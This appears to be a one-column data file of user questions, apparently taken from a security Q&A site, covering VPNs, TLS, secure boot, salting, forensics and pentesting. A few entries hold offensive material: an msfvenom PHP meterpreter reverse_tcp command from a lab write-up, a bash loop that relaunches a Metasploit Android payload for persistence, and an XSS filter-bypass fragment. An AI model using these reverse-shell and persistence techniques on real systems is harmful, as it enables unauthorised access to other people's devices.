instruction
stringlengths
24
29.9k
Wouldn't using Starbucks Wifi make me somewhat anonymous since my ip address would be the same as other users connected to the same network? Therefore, no need to use a VPN assuming I don't want the website I'm connected to know my identify. Of course, the website can figure who I am assuming my browser fingerprints is...
I have a Sophos XG firewall. I use it at home (to play around with) This firewall is capable to scan HTTPS traffic. It decrypts the traffic and re-encrypts the traffic again. For the re-encryption of the traffic the firewall uses his own certificate --> Why? Wouldn't it be easier to copy the encrypted traffic, decrypt...
I am planning to set up a dedicated hardware firewall like Protectli and run a pfsense on it. I already know that: it is a good practice NOT to have a wireless adapter on the firewall unit it is ok to run two independent LANs from the same server (one for the intranet, one for internet-facing servers) Will it be secu...
I am seeing different TLS versions (1.3 and 1.2) in the handshake and intermittently it fails with this error: TLSv1.3 (OUT), TLS handshake, Client hello (1):. 2020-05-28T14:44:00Z.664 [thread-3752] Info TLSv1.3 (IN), TLS handshake, Server hello (2):. 2020-05-28T14:44:00Z.665 [thread-3752] Info ...
Management decided to switch the authentication-backend from LDAP to Kerberos as LDAP is deemed "obsolete and insecure". Also they want to switch from Apache to nginx for "performance and reliability". Ultimate goal is to enable SPNEGO for single-sign-on within the domain. Previously, we happily used Apache's mod_authn...
I haven't seen any seen mechanism by which UEFI can detect the most recent update to a binary from being swapped out for an older binary that was signed with the same key as the up-to-date binary. Google's vboot is the only PC firmware I know of that uses anti-downgrade counters. Does the UEFI specification specify a w...
I was exploring the IKEv2 StrongSwan client implementation for Android. What I fail to understand is that Android and Java do not support raw sockets, whilst the IKEv2/IPSec works below the transport layer, which seems counter-intuitive. How exactly does the communication happen after the CHILD_SA aka IPSec SA is estab...
As the title suggests what’s the best way to permanently delete data from an iPhone. I know when you delete something, it’s not really deleted, but merely marked as ‘free space’. So how, on an iPhone, can you make sure it’s gone for good so no high-level forensics can retrieve it?
On a Mac, one can go into recovery mode by turning off the Mac and clicking Command R while turning it on. Then, by typing resetpassword into Terminal, one is able to reset the password without entering the old password. Why is this not considered a security flaw? It doesn't seem to lock out data, so I can easily go in...
When a certificate is being imported on Windows, at some point the following option is available: [] mark this key as exportable I understand that this is used in case the certificate needs to be transmitted from a client to a server, for example to establish a TLS communication channel. Is it correct to say that the k...
As mentioned in the title, my question is if it's possible to find out when a wifi router has mac filtering activated for e.g. by airmon-ng or other tools?
My title says it all but here is a scenario: I download a suspicions file and run it inside a VM.If everything works, I will deploy it to my original PC. I plan to use these: 1.Oracle VM 2.Vmware 3.Hybrid Analysis So, can a ransomware detect these at the first place?
File this under "gosh, I'd hope not," but I've been surprised before. I have a hash (HMAC SHA-1 specifically). I need to store the full hash, but due to constraints outside my control, I can only use a limited number of characters to store it. I chose to change to base-36 to make the hash a shorter length. Changing t...
I understand the logical steps of asymmetric key cryptography as it relates to TLS, however, I've started using Git and in a bid to avoid having to use a password for authentication, I've set up ssh keys for passwordless authentication. I understand that these ssh keys are complements of each other but I do not underst...
Here's an example of the address they're coming from: I'm familiar with filtering settings, but how can I filter something that's different each time?
Where SAN means: Subject Alternative Name. I feel I have a basic misunderstanding in which certificate the SAN stuff shall go: ca or server or both or what? It might be 3 Years or more in the past, where chrome / chromium browsers required the occurrence of the SAN extension in certificates. While fierfox still accepts...
I'm studying for the Security+ exam with the help of Total Seminars' Udemy course and in one video they claim that a digital signature is generated by encrypting a message with the sender's private key and then hashing the result. The digital signature is then verified by encrypting the webpage with the sender's public...
Is there any way (software or hardware solution) to create a usb drive that can make its contents readable only on specific PCs using their hardware serial numbers?
If I delete photos which are stored in iCloud from my phone. (Which is also linked to my iPad) I know the data is then made ‘free space’ but is still on the phone In some format. If I delete it from my phone, it’ll also delete from my iPad, but will it stay in my iPad as ‘free space’ even though it was originally delet...
I do not have much knowledge of VPN (concepts, implementation specifics and what not). In general, to networking as well. So please correct me if my question doesn't make sense. Is it possible that a VPN user, (let's say using different VPN clients) connects to the same VPN more than once (using same credentials) simul...
I know nothing about cryptography. How does one encrypt a file in the strongest possible way, such that it can be accessed some years later? I prefer that it should be fairly resistant from brute force and other possible ways attacks. I need some direction only.
After asking for e-mail lists the other day, I got linked to this: https://combo-list.com/ This is a very strange "blog" which appears to be regularly publishing (or linking to, rather) lists of e-mail addresses which have supposedly been leaked in data breaches. I have no interest in the passwords, but it seems to als...
As a consumer of Visual Studio Marketplace extensions, I frequently find myself wondering if this or that nice little add-on might be a security problem. For example, maybe it uploads my code somewhere. Is this a risk I simply have to take? Is this somehow checked? In the case of a popular add-on, would it be reasonabl...
I know that subscribers can be tracked using IMSI. I also know IMSI follows a pattern of MCC+MNC+MSIN where MCC and MNC parts remain static for a certain PLMN. What changes is the MSIN part. As such, by guessing a random MSIN and using the fixed PLMN, part a random IMSI can be guessed. If an attacker guesses a random I...
If there are chats that have been deleted, is there a way to recover these with any recovery tools, or are they gone forever?
A company I know of has a password policy that requires employees to change passwords (on AD server) every 90 days. The vast majority of its new hires start on the 1st of the month. Thus, several hundred password resets happen on a predictable schedule. My intuition tells me that this is tactically valuable information...
Can somebody confirm me that the HTTP-XXS-protection header and the X-content-type header is useless in the case of a REST api who provide only json to clients ? Can someone explain me why exaclty ? Thanks.
We have a requirement for Data loading function to Aircraft. There is Avionics standard termed as ARINC 615A and ARINC 665. 615A specifies high speed Ethernet based data load operation; where POINT-TO-POINT Ethernet connection between Data loader device and target machine in Aircraft. Since ARINC 615A doesn't seem to p...
What if a ddos attacker hits public websites (google, amazon etc) with some requests but spoofed the souce ip to the victim's ip. Now the responses will be sent to the victim's ip. Attacker can rotate between the millions of public websites so that the site wont find anything suspicious. This seems like an easier way t...
Let's say I look up a domain on WhoIs and see that the Registrant Organization is Example Company. How sure can I be that the domain actually belongs to Example Company? Can a malicious actor just say they are working on behalf of Example Company when registering, or are there stringent checks?
I have done a bit of research on what hackers look for in an email address, and it looks like any information is valuable to them, but a friend that knows about the subject has told me that it was possible that a hacker decides to do nothing to your account if you're "broke or a child". I was confused, because I think ...
I'm trying to understand the secure boot process of an OS but there are few points I can't wrap my head around. At a high level, afaik, secure boot ensures that the loaded OS is authenticated by its respective vendor. If an adversary modifies the OS code, the authentication checks during secure boot fails and user is ...
Our site hosts static assets at /assets/…. In debugging a font-related issue, I looked through our logs for unusual activity. I found a bunch of requests like these method path referer PUT /assets/js/40-8b8c.chunk.js https://mysite.com PUT /assets/fonts/antique.woff2 https://mysite.com/a...
I see there is no encryption for ms chap v2 (providers settings.) Furthermore, what can I do if the provider refuses to cooperate and improve security? Can a vulnerability in this setup be exploited by people on the same LAN, or between my port and the provider's equipment?
Under what circumstances that a Rainbow Table attack is best used?
I was fiddling with my router's uPnP settings and found this: Why is an external IP address showing here? I also did a reverse IP search and to my surprise the IP 25.54.27.39 showed "UK Ministry of Defence". I am not in the UK military or on a military base. Is something malicious going on here? I have already disable...
I am trying to learn basics of web security vulnerabilities. I have found a website, where on reset password, you get a link in the email with a token, and when you click this link, the webpage opens and the url is reflected in a form action. Something like this: password reset url: https://target.com/token=q123sefgetr...
I find certain APIs (that provide sensitive information) using algorithms like ECDHE with X25519, on top of the already encrypted SSL connection. This compels us to use libraries like Tink (when we have to use it in Android Apps) that provides such algorithms, though the classes it provides us for using such algorithms...
I am building an asp .net mvc project and I want to save the user who is currently logged in , So I read about sessions and cookies and I found that authentication tokens stored in a cookies are a solution for the problem, So I read about them and I need to know If I am understanding this before implementing anything h...
If a webapp sends Cache-Control: private it shouldn't be cached for example with nginx proxy_cache. What could happen if it was cached anyhow? Could another visitor see the personalized login of another user? Might another visitor then being logged in as another user?
I'm trying to find difference between Zeek and Snort 3. Сan anybody tell me what are the advantages of Zeek against Snort 3?
I have just started Reverse Engineering and Malware Analysis. I wanted to know what is whole process by which attackers put malware into software after cracking it, especially without affecting the functionality of the cracked software?
SoC's have begun integrating a hardware Root-of-Trust to mitigate attacks on Secure Boot. Examples include Google's OpenTitan & Intel PFR. What are the threats addressed by discrete "Secure Enclave" type root-of-trust solutions? What are the benefits over Secure Boot from ROM?
I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches. For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script: msfvenom -p php/meterpreter/reverse_tcp LHOST=xxx....
I've been playing around with some of the C2's available at GitHub that I've found at https://www.thec2matrix.com/matrix It's cool to play around with tons of Linux machines I own and send them commands and retrieve stats out of them with custom scripts at the ease of uploading them as a "payload" like execute this on ...
So guys, I messed up with the configs in a computer and let the SSH server open to the wild with ROOT login enabled. I'm trying to assess the potential damages, which I may never know for sure. Regrets apart, this mistake lasted for over a year until I verified several SSH authentication attempts in secure.log (bots an...
I've never really worked with this tool, John Jumbo 1.9. I'm just curious since people say 7zip is a secure way of encrypting files, so I wanted to try it myself. Anyways, I encrypted a file with 7z, and installed john-jumbo on my machine running macOS Catalina. I wanted to get the hash of the file, so I ran john 7z2jo...
I received an email from what looked like a friend, it had a suspicious link I inspected the email address and saw that the username was spot on but the domain name was totally different. I also put the link through a suspicious link checker and it came through as such. The username is quite a unique one I'm very sus...
Like when using public wifi, what can I install/use on both my Android phone and Windows laptop to make it impossible (or very difficult for someone who is not an expert) from seeing what websites i visit?
I was wondering, if the special html verification file can be used by "hackers". This file contains some unique string that is linked to a user's Google Console account. Google asks the user not to erase it after the initial verification, or else the verification can be lost. Is it 100% safe to leave this file exposed?...
I have encrypted a file using a program with a password and would like to decrypt it on another device just with the password. Is there any software that takes the password, runs it through all key derivation functions and decrypts the file? The algorithm used is AES 256.
FORTIFY static scan has detected that this piece of our java code is vulnerable to DNS spoofing attack: public String getLocalhostName(){ try { return Inet4Address.getLocalHost().getHostName(); } catch (UnknownHostException e) { return null; } } FORTIFY also gives these recommendations: R...
A website fully filter the alert function from his website, and replace it with an empty string, but I want to bypass it and still popup an alert, I am trying to solve an XSS challenge, and I figure out that the site identify the double l char, and fully removes the string. http://alertmywebsite.com/2.php?xss=<script>a...
A bot network(?) has been after my website for quite a while now. Here is a breakdown of what they do: They register several accounts using random characters for building a first and last name which look like this: HludvkxTGVIwP oBScrLdvJ AicSJbYk uWrVKZtSdTNAv ... The email addresses used for these profiles seem to...
When I try to intercept the traffic through burp suite, the app itself won't load. This doesn't happen in some applications like Chrome and Gmail but happens on YouTube and other applications. It shows that there is no internet connection but I can still surf the internet through Chrome.
I am new to web development and am trying to implement a password reset feature according to the OWASP cheat sheets: Forgot Password Cheat Sheet The cheat sheet advises not to send the username as a parameter when the form is submitted and sent to the server. Instead one should store it in the server-side session. Howe...
I've read here that HTTPS replay attacks aren't possible from MITM attacks but I want to be sure that it's not saying that HTTPS replay attacks aren't possible at all. I want to know if I have to implement my own obscure method for temporarily preventing the inevitable or if something like this already exists. Suppose ...
I have an old computer and I am sure it has trojan or malicious code but after that I bought new one. The problem is I did not change my old headphone that I used in my old computer and I plugged it in to the new computer. So are there any problem to use my old headphone?
I don't understand this part of the Rainbow table attack. In all my Google searches, it says that a hacker uses a rainbow table on password hashes. But how does the hacker obtain the password hashes in the first place? I have rephrased this question from a previous question which was closed: How is Salting a password c...
I have the following setup with a keycloak authentication server and an application: user logs in on application client side, send un/pw to server application server sends un/pw to keycloak server for a token keycloak server sends a token back to application server application server outputs web page with sensitive da...
Is there a simple C library or function to programmatically generate a self-signed certificate in C on Ubuntu? Of course, one can execute a simple system("....") call to execute a CLI. I am looking for a native, small, stand-alone library just for this purpose with possibly added functionality but not with the full-we...
Does Snort have the "automatic protocol detection" function like Suricata? I read that Snort 3 has "Autodetect services for portless configuration" feature. Does it mean that this function is absent in Snort 2? Or they are completely different functions?
A fellow developer and I have been having a discussion about how vulnerable a few different methods of developing a hash are, and I've come here to see if smarter people than I (us?) can shed some light. In PHP, I feel the below is secure ENOUGH to generate as 32 character value that could not be reasonably broken via ...
I have a Microsoft Account linked to a Microsoft Authenticator app for 2FA purposes. Every time I log in, it first sends me the Authenticator request, but I can always click "Other ways to sign in" and then choose "Use my password instead", which then prompts me for the good old password, and logs me in successfully. ...
The OWASP IoT top 10 and the ASVS appendix C warn to protect against firmware rollbacks: C.22 - Verify that the device cannot be downgraded to old versions (anti-rollback) of valid firmware. What is the purpose of this? In what scenario does this offer protection? Is this supposed to protect against accidental instal...
It seems when SQL TDE is implemented certificates are used to protect the keys used to encrypt the data. What would be the benefits of using a CA signed certificate in this scenario over a self-signed certificate?
For customer reasons, my web app authenticates the user against a proprietary user database using a simple API like bool authenticate(string username, string password) In case the user changes his password or his account is closed etc., I will need to periodically (say every half hour) re-authenticate against the user ...
I'm looking at the results of an sslscan of an internal web application, which reports the following: I'm not sure how to interpret these and couldn't find an elaboration of what exactly this represents on their github page. Are these the signature algorithms used in the available cipher suites for the TLS connection?...
Its usually recommended that 'don't use your own system of Crypto' rather use standard SSL/TLS! I understand that SSL/TLS is a complete protocol suite that addresses all three elements of CIA triad. What if I need to use a subset of CIA, say I just need Authentication and Data Integrity. In such a cases isn't using ful...
Hello I have recently started learning Reverse Engineering. I often hear that it's much easier to find vulnerabilities in a program by looking at it's source code, but i don't know how to find them or what type of loopholes i can find by looking at source code. So Can someone give some examples, study resources or Eboo...
I am running Hyper-V for years. Recently I tried to harden my environment by applying GPOs that disable NTLM, as NTLM is discouraged by Microsoft. Now Hyper-V VMConnect stopped working and I keep getting “An authentication error has occurred. The function requested is not supported … This could be due to CreSSP encrypt...
Noob question alert. I understand SSL certificates help mitigate MITM attacks, but I see the process to be so badly designed. Basically the client needs to verify that it is talking to the particular domain's ip. This could be implemented this way. There could be a DNS record containing the server's public key. The cli...
I'm in the process of setting up a local (i.e. offline and very limited) business, and I'm thinking of generating invoice IDs randomly to avoid the clients knowing that they're customer number #00000001 (and because I prefer something like #30549805 to CLIENT1). I've come across the following script to do this: #!/usr/...
My domain expired years ago and was registered by another party. I have already read Can someone read my E-Mail if I lose ownership of my domain? and see that the answer is yes. Now if someone buys the domain and creates a mx record pointing to the his own mail server he can read all my confidential emails the people ...
I saw today that TLS 1.1 and 1.2 are not enabled by default in Windows 7 and Windows Server 2008. They can be enabled after an optional update, and after setting a registry key. Why? Negotiating the TLS version is supposed to find the highest version supported by both parties. What harm does automatically supporting a ...
I've recently learned about JWT tokens, but I don't understand why I need them. Considering: HTTPS is enabled, thus the access token can't be stolen along the way. it's encrypted. If at anytime, the hacker finds a way to read incoming JSON responses from the server, then he can steal both tokens, since the access and ...
I have an old computer that has old games on it and has some kind of virus or such. If I hooked up its drive, would I be able to copy the files over to my laptop, or would even connecting the drive trigger a virus?
We have the following configuration of the /etc/network/interfaces file which was setup by somebody else on this system. It has worked well by allowing other systems on LAN (and the internet) to connect to an nginx/apache run server on that IP regardless of interface they are connecting through (i.e. en or wl). auto lo...
I read that it is important to use a salt together with the password to avoid rainbow table attack. I agree with that, but is there any difference, in terms of security, if I use password + salt or I use a complex password? That is, do I need a salt to avoid rainbow table attacks if I use a complex password?
I have encrypted a USB drive with BitLocker and I have lost the password and the hash backup. I have tried to search for something to decrypt the drive but came short. I have imaged the USB drive and was wondering is there a way to decrypt an image file?
I am using some frameworks that store salts inside databases. For example this article shows how Devise stores salt together with the user information. My question is why do people say that salts prevent rainbow table attacks? I make this question because if I were the attacker and I had a "Devise table" then I might u...
The Star recently published an article describing an alleged attack against a Moroccan journalist. The article describes the attack as such: Forensic evidence gathered by Amnesty International on Radi’s phone shows that it was infected by “network injection,” a fully automated method where an attacker intercepts a cel...
I am working on a project which requires the name of the page as a query parameter 'path'. The app stores path variable as res.query.path. My manager asked me to pay attention to LFI, so I'm concerned about it. The app is using Express.JS, and no PHP. My question is if the input is not handled carefully, is it still vu...
I left my apartment for few days, so I disconnected my wireless router but I forgot to disconnect my Chromecast as well. I remember that when a Chromecast can't find the network it was connected to anymore, it creates an open network that can be used to reconnect to another wireless network. The issue is that I'm away ...
This is the bash script for my android payload #!/bin/bash while : do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity sleep 60 done The issue is when I do Clear running apps in the mobile it doesn't get the connection back, it does the following... Top Left Terminal is the bash s...
A recent penetration test has discovered that my org is using the JWT authentication scheme that allows the 'none' algorithm. How exploitable is this in the real world? I understand that the issue can be used by an attacker to change the payload to another user and then 'sign' it using the none algorithm that would be ...
I wanted to know if bettercap has a feature that allows to view TLS handshake phase information (as Wireshark does), for example the "Client Hello" ?
OpenVPN recommends using a 2048 RSA key size for greater security, however, the hardware I'm using is somewhat weak and defaults to using a 1024 RSA key size. I'm trying to determine if it's worth the hassle of manually changing things to a 2048 sized key. I'm not concerned about anyone eavesdropping on any data bein...
This is an unconventional approach of CSRF that I came across while doing the pentest for an Android mobile application. The original request is as follows (NB: Values have been edited): POST /edit/ HTTP/1.1 User-Agent: example Android (22/5.1.1; 320dpi; 720x1280; Accept-Language: en-US Cookie: cookies Authorization: B...
We're trying to build a packet sniffer that can search and quarantine malware in encrypted transactions without decrypting said transactions. At present, we're exploring whether homomorphic encryption schemes can help us look for patterns that match rules (which are also encrypted). We're thinking of creating an on-pre...
I'm using hostapd to setup a wireless access point and dnsmasq as a DNS/DHCP server. I defined in dnsmasq to reply with the IP of the access point (10.0.10.1) when it receives a query for www.messenger.com. Using the setoolkit, I'm hosting on 10.0.10.1:80 a page identical to that of www.messenger.com. When I connect wi...
I'm doing a pentest on a FreeBSD machine running CuppaCMS. Already managed to login into the CMS with admin privilege, but it only takes me to a manager menu, with some options to change some tables and stuff like that, no RCE visible escalation. So i discovered an exploit on exploit-db.com that leads to LFI, after som...
I would like to know how the communication between my gym card and the checking point works. I bought an ACR122U reader, but it seems that I can't read my card with it, the card is not recognized as something readable with that adapter. The card hasn't the black stripe that suggests that it is a magnetic one. When I do...
I've been unable to find any research or information on this. Google periodically signs me out and forces me to sign back in. I have multiple devices and multiple google accounts so it's a bit frustrating but that's just how it is. However I was thinking about whether this practice is actually secure. It seems to en...
I've posted a question (link) related to a potential compromised computer via SSH access with root user. Although no evidence of a break-in, I'm considering extended measures to ensure (as much as possible) that my hardware has not been compromised. The software rootkit/malware would be easier to deal with apart of tec...
I've been looking at the following figure which shows, with Arm TrustZone architecture, resources of a system can be divided into a Rich Execution Environment (REE) and a Trusted Execution Environment (TEE). Here I'm trying to understand the following: Suppose a remote party wants a particular trusted application (TA)...
My provider still uses VPN with MS-CHAP2(no encryption). How easy can it be exploited? I see a lot of articles but they are from 2012/2013. And some sites do not work. What is going on? Has Microsoft fixed it? Is it still not secure? How cheap such attack can be? What should I do if provider will not consider change of...
I recently moved an old WordPress site from one hosting to Amazon Lightsail. Once the transfer was done, I noticed that WordPress, its plugins, and themes were all out of date. So, I updated them all. All good after that. Then, within a day, a user "wordcamp" was registered on WordPress using the email wordcamp@wordpre...
I have a Wordpress tooltip plugin that converts any links in the tooltip text using special entities, so that my rel="noopener" becomes rel=&quot;noopener&quot;. Is there any difference in terms of security in this? Do browsers correctly interpret the rel="noopener" tag? To clarify, I'm referring to a new page opened w...
It seems that SOCKS5 proxies somehow know the client's timezone (at least) or maybe even the precise datetime. I determined this because the proxy tears the connection in case the local timezone on the client machine is UTC, but the proxy works well if the client timezone is set to GMT+3. I checked the request that is ...